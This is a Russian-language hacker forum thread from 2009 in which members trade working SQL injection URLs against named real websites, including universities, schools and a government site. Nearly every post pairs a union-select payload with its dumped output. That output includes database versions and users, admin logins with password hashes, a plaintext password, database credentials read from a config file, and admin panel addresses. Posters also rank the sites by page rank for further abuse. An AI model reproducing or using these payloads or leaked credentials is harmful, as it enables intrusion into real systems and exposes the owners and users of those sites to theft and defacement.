SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Postgre SQL
    PostgreSQL 8.3.5 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.2.1 (SUSE Linux)
     
    1 person likes this.
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.valgymosutrikimai.lt/index.php?id=15&lng=-1+union+select+1,user()+/*+
    augrika_user@localhost

    PR6
    http://www.afropop.org/news_flash.php?ID=-593+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+/*+
    4.1.22-standard

    http://ratibor-tlt.ru/news_full.php?id=-1+union+select+table_name+from+information_schema.tables+limit+73,100+--+
    dle_users
    dle_email

    http://www.fk-novgorod.ru/news/news_full.php?id=-1+union+select+1,concat_Ws(0x3a3a,user_type,user_permissions,username,user_password),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1+--+
    3::zik0zjzik0zjzik0xs zik0zi000000 qlctzq000000 zik0zi000000::fk-novgorod::$H$94M6MbO.ED4Ksztlk7usyNTUQoGTe61

    http://www.hificentre.com.ua/news_full.php?id=-1'+union+select+1,2,3,concat_ws(0x3a3a,id,user,pass),5,6,7,8,9,10+from+userlist+--+
    1::adminos::97154761
    http://www.hificentre.com.ua/admin/

    http://www.teremnn.ru/news_full.php?id=-1+union+select+group_concat(table_name)+from+information_schema.tables+--+
    /* Талицы */

    http://www.khakib.ru/news_full.php?ID=-1+union+select+1,group_concat(table_name)+from+information_schema.tables+/*+&page=0

    http://www.astra-link.ru/news_full.php?id=-1+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+--+
     
    #9582 DezMond™, 3 Jun 2009
    Last edited: 3 Jun 2009
    1 person likes this.
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.autokovrik.com/board.php?pos=10&&view=1&mu_id=16+unioN+select+1/*&ms_type=&mm_id=&mistoid=&spoisk=

    Версия 4.х.yy,посимвольный перебор.Префикс так и не вскрыл.

    Боян или нет,но всё же:

    http://wwww.1gb.ru/show_article.php?upd=126'+order+by+26/*

    Третья ветка.
     
    #9583 Велемир, 4 Jun 2009
    Last edited: 4 Jun 2009
  4. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Киевский завод стеклоизделей

    http://www.kzs.com.ua/page.php?id=47+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+FROM+users+LIMIT+1,1

    kzs@localhost:4.1.22-log:kzs
     
    1 person likes this.
  5. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    http://www.valgri.it/england/shop/details.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+admin/*
     
    1 person likes this.
  6. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    http://www.parcocollinemetallifere.it/comuni.php?id=-1+union+select+1,2,concat_ws(0x3a,user,passwd),4,5,6,7,8+from+archivier.utenti+--+
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    PR 4
    Code:
    http://www.mdkiosk.com/subscription.php?ID=-1+union+select+concat_ws(0x3a,user(),database(),version())
    mdkiosk@localhost:mdkiosk:5.0.27

    .TV PR 3
    Code:
    http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17/*
    tfboogaloo@logic:FamicomDojo:5.0.37-standard
     
    #9587 mailbrush, 4 Jun 2009
    Last edited: 4 Jun 2009
    2 people like this.
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ###############################################
    PR5

    http://www.metodistademinas.edu.br/novo/cursos2v.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

    [email protected]:metodistademin:5.1.30-community

     
    _________________________
    2 people like this.
  9. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    http://www.anosy.gov.mg/index.php?self=5&page=-2+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users+--+
     
    #9589 -JC-, 4 Jun 2009
    Last edited by a moderator: 4 Jun 2009
    3 people like this.
  10. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.pragmaticus.ru/news.php?id=-320+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6
    5.0.67:p[email protected]:pragmatic


    ТИЦ 80, PR 3
     
    1 person likes this.
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR3

    http://battlefieldsingleplayer.planetbattlefield.gamespy.com/index.php?pg=games_temp&g=1+AND+substring((version()),1,1)=x


    Version: 4.1.21-log
    User : [email protected]
    Database : Dnam
     
    1 person likes this.
  12. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    посмотрите сайт, я уже несколько раз видел такое. Я выложил сюда ИНДЖ и через 10 мин на сайте такое же написано было. Аналогично и с этим сайтом

    там было типа "AYYILDIZ TEAM Ab1i HACKED" уже кто-то ачат влепил
     
    #9592 udman, 4 Jun 2009
    Last edited: 4 Jun 2009
    1 person likes this.
  13. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.icabc-pd.com/pd-seminars-seminar.php?id=-915+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17
    4.1.20:pdperson@localhost:dbpd

    PR4

    ----------------
    http://hbdinc.org/seminar.php?c=-1004+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6
    5.0.75:[email protected]:hbdinc

    PR 5

    ---------------
    http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14
    5.0.45:aphex@localhost:web1

    Таблицы:
    TA_users (user,pwd)
    http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws(0x3a,user,pwd),7,8,9,10,11,12,13,14+from+TA_users

    dvargas:302697aaf74426092f91730fb2d6ccd3
    311admin:ce4fb0b63857dfa71184f137f0c102e5
    jbach:9293d02937dd21a4595d650aa52a4cb4



    eecenewsusers (user,pwd)

    http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws
    (0x3a,user,pwd),7,8,9,10,11,12,13,14+from+eecenewsusers+limit+0,1

    jean:0421008445828ceb46f496700a5fa65e
    webmaster:d2718c3f00a7aed3c6a0c12c31dac3fe


    seminarusers (user,pwd)
    http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws
    (0x3a,user,pwd),7,8,9,10,11,12,13,14+fro+seminarusers+limit+0,1

    chaouki:47c4af02a9fba4a578f041e3277be116
    faculty:bb8ebde87e5ea6724df5ab428f20b8c4
    graduate:939ceb2be77a7fe133cdea4aef65c921
    aphex:a18c70c5e2f22ca9cd7d389c8e436a92
    locutus627:9174e8961e5e69e81c9fd9dbd44b0e5b
    webmaster:204520204334e36e
    jean:0421008445828ceb46f496700a5fa65e


    wp_users (ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name)

    1:admin:$P$BK8i8ZTFXTDciGPGomG1mxoEKPdaVf0:admin:[email protected]::2009-05-28 04:08:03::0:admin
     
  14. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,concat_ws(0x3a,version(),user(),database%20%20%20()),3,4,5,6,7,8,9
    5.0.51a-community-log:[email protected]:dennisvink_dennis

    Таблица admin (id,user,pass)
    http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+17,1

    Вытаскиваем:
    http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,concat_ws(0x3a,id,user,pass),3,4,5,6,7,8,9+from+admin+limit+0,1

    2:dennis:bf2eb761d40672c33dbf02da9ab62837

    Админка: http://www.dennisvinkonline.nl/admin/
     
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    gamebrix.com

    Code:
    http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
    Code:
    db@fs1@C34728-112966:tomcatusersnet:5.0.45-community-nt
    Code:
    http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1'
    Code:
    http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,load_file(0x433A5C4E616272616E615C7068707365727665725C7777775C636F6E6669675C636F6E6669672E706870),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
    Code:
    define('DB_HOST','C34728-112966');   //  database host name
    define('DB_NAME','tomcatusersnet');     //  database name 
    define('DB_USER','db@fs1');        //  database username   
    define('DB_PASSWORD','digital');
    
    define('FORUM_DB_HOST','C34728-112966');   //  database host name
    define('FORUM_DB_NAME','forumnet');     //  database name 
    define('FORUM_DB_USER','db@fs1');        //  database username   
    define('FORUM_DB_PASSWORD','digital');
    Code:
    http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+forum.phpbb_users+limit+1,1
    Code:
    gbrixadmin:020ed5f83af5275d6ad6b15bbd247576
     
  16. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.swan.ac.uk/compsci/research/seminars/seminar.php?seminar=-422+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12
    5.0.26:[email protected]:seminar

    PR 7



    http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database())
    4.1.22:goldbiouser@localhost:GoldBio
     
  17. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Специально для Турков чтобы она не брали чужие хаки и не писали что их страна великая и там супер хакеры, пускай свои ломают сайты, точней доламывают )))

    maxoyun@localhost
    5.0.33-log
    maxoyun

    Таблы

    [email protected]
    5.0.51a-log
    iumezusa_iumezusa

    Мемберы

    malatya__malatya@localhost
    4.1.18-nt-max
    malatya__malatya


    abhaber_root@localhost
    5.0.67-community-log
    abhaber_abhaber


    godtu_user@localhost
    5.1.30-log
    godtu_godtu


    root@localhost
    5.0.32-Debian_7etch3-log
    otodefteri
     
    2 people like this.
  18. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database())
    4.1.22:goldbiouser@localhost:GoldBio



    http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
    5.0.45:root@localhost:events
    мммм, как сладко :)

    Вытаскиваем:
    http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,user,password,host),4,5+from+mysql.user/*

    root::localhost
    root::webhost.bli.uci.edu
    root::127.0.0.1
    ntroiwikiadmin:*8B8A4BCE24C00513D82A6DE18A58DD80DFB1E993:localhost
    vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742F0:%
    vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742F0:localhost
    vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742F0:localhost.localdomain


    неплохо, root Без пароля, под vpwikiuser тоже множно подключиться откуда угодно :)
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR6

    http://www.whathaseuropedone.eu/event_detail.php?event_id=-227'+union+select+1,2,3,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*


    Database Version: 4.1.15-standard
    Database name: whateurope_1
    User name: whatadmin@localhost
    Os : pc-linux-gnu
     
  20. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    ttp://www.agira.ru/school.php?serv=2+and+substring(version(),1,1)=4
    ТИЦ 40



    http://www.sschouston.org/school.php?sview=-35+union+select+concat_ws(0x3a,version(),user
    (),database()),2,3,4,5,6,7,8,9,10,11,12,13,14
    5.0.67.d7-ourdelta-log:[email protected]:sscdata

    таблицы
    http://www.sschouston.org/school.php?sview=-35+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables

    users(id,username,password)
    http://www.sschouston.org/school.php?sview=-35+union+select+concat_ws
    (0x3a,id,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14+from+users

    1:member:268184C12DF027F536154D099D497B31

    PR 2

    Вход: http://www.sschouston.org/login.php

    ----------------

    http://www.natronaschools.org/school.php?id=-57+union+select+1,concat_ws(0x3a,version(),user
    (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3
    6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57
    4.1.22-log:adbay@localhost:school_db

    PR 4

    ------------

    третий мускуль
    http://dcrush.obninsk.ru/school.php?id_p=1+and+substring(version(),1,1)=3
     
Thread Status:
Not open for further replies.